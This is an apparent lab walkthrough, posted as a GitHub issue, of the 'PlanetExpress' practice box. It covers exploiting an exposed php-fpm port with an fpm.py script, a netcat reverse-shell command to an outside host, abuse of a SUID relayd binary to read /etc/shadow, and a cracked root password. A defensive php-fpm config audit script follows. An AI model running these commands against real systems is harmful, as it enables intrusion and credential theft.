WDavid404 / PG-Box

PG box walkthrough note

PlanetExpress (easy) #26

Open WDavid404 opened 1 month ago

WDavid404 commented 1 month ago

Keypoint:

WDavid404 commented 1 month ago
PORT     STATE SERVICE     REASON         VERSION
22/tcp   open  ssh         syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp   open  http        syn-ack ttl 61 Apache httpd 2.4.38 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-generator: Pico CMS
|_http-title: PlanetExpress - Coming Soon !
|_http-server-header: Apache/2.4.38 (Debian)
9000/tcp open  cslistener? syn-ack ttl 61

ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.207.205/FUZZ -->

content                 [Status: 301, Size: 320, Words: 20, Lines: 10, Duration: 187ms]
themes                  [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 111ms]
assets                  [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 91ms]
plugins                 [Status: 301, Size: 320, Words: 20, Lines: 10, Duration: 93ms]
vendor                  [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 94ms]
config                  [Status: 301, Size: 319, Words: 20, Lines: 10, Duration: 94ms]

ffuf -u http://192.168.207.205/config/FUZZ -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -fw 20 --> config.yml

--> find "PicoTest" plugin info: http://192.168.207.205/plugins/PicoTest.php --> DOCUMENT_ROOT: /var/www/html/planetexpress

See the 9000/tcp port method info on HackTricks; it provides an exploit py file.

python fpm.py -c "<?php passthru('id'); ?>" -p 9000 192.168.207.205 /var/www/html/planetexpress/plugins/PicoTest.php | head -n 10 --> work!

python fpm.py -c "<?php passthru('nc 192.168.45.180 80 -e /bin/bash'); ?>" -p 9000 192.168.207.205 /var/www/html/planetexpress/plugins/PicoTest.php | head -n 10 --> get a reverse shell

find / -perm -u=s -type f 2>/dev/null --> /usr/sbin/relayd is interesting.

/usr/sbin/relayd -h --> use /usr/sbin/relayd to read the /etc/shadow file

Crack the shadow hash with the John tool: john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt --> neverwant2saygoodbye

su root --> succeed
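The foothold above exists because php-fpm on 9000/tcp accepted FastCGI requests from any host on the network, so a remote client could hand it a PHP file to execute. The script below is an added example for the defensive side, not part of the walkthrough or of any tool it mentions: it parses php-fpm pool configuration and flags a `listen` directive that exposes FastCGI beyond the local machine. The three pool snippets are constructed samples; the directive names (`listen`, `listen.allowed_clients`) are real php-fpm settings, and a bare port such as `listen = 9000` means "all IPv4 interfaces".

```python
"""Audit php-fpm pool configs for FastCGI listeners reachable over the network."""
import ipaddress
import re
from typing import Dict, List

# Constructed sample pools (not taken from the box). The first mirrors the risky
# layout behind an open 9000/tcp: a bare port binds to every interface and no
# client filter is set. The other two are hardened variants.
WEAK_POOL = """
[www]
user = www-data
group = www-data
listen = 9000
pm = dynamic
pm.max_children = 5
"""

SOCKET_POOL = """
[www]
user = www-data
group = www-data
listen = /run/php/php-fpm.sock   ; unix socket: only local processes can reach it
listen.owner = www-data
listen.group = www-data
listen.mode = 0660
"""

LOOPBACK_POOL = """
[www]
listen = 127.0.0.1:9000
listen.allowed_clients = 127.0.0.1
"""

DIRECTIVE = re.compile(r"^([\w.]+)\s*=\s*(.*?)$")


def parse_pool(text: str) -> Dict[str, str]:
    """Return a directive -> value map for one pool file (';' starts a comment)."""
    cfg: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("["):  # blank or [pool] header
            continue
        m = DIRECTIVE.match(line)
        if m:
            cfg[m.group(1)] = m.group(2).strip()
    return cfg


def audit_listen(cfg: Dict[str, str]) -> List[str]:
    """Return human-readable findings; an empty list means the listener is local-only."""
    findings: List[str] = []
    listen = cfg.get("listen", "")
    if not listen:
        return ["no listen directive: php-fpm will refuse to start this pool"]
    if listen.startswith("/"):
        return findings  # unix socket, unreachable from the network

    # Forms: "port", "ip:port", "[ipv6]:port"; rpartition isolates the host part.
    host, _, _port = listen.rpartition(":")
    host = (host or "0.0.0.0").strip("[]")  # bare port == every IPv4 interface
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return [f"listen = {listen}: host is not an IP literal, check manually"]

    if addr.is_unspecified:
        findings.append(f"listen = {listen}: FastCGI bound to every interface")
    elif not addr.is_loopback:
        findings.append(f"listen = {listen}: FastCGI bound to a non-loopback address")

    if not cfg.get("listen.allowed_clients"):
        findings.append(
            "listen.allowed_clients unset: any host that can reach the port may submit FastCGI requests"
        )
    return findings


if __name__ == "__main__":
    for name, pool in (("weak", WEAK_POOL), ("socket", SOCKET_POOL), ("loopback", LOOPBACK_POOL)):
        for f in audit_listen(parse_pool(pool)) or ["ok: local-only listener"]:
            print(f"{name}: {f}")
```

Running it against a real system means pointing `parse_pool` at each file under the pool directory (for example `/etc/php/*/fpm/pool.d/*.conf`); any non-empty finding list is a pool whose FastCGI endpoint should be moved to a unix socket or at least to loopback with `listen.allowed_clients`. An unknown service on 9000/tcp in a scan, like the `cslistener?` line in the note, is the external symptom this check catches at the source.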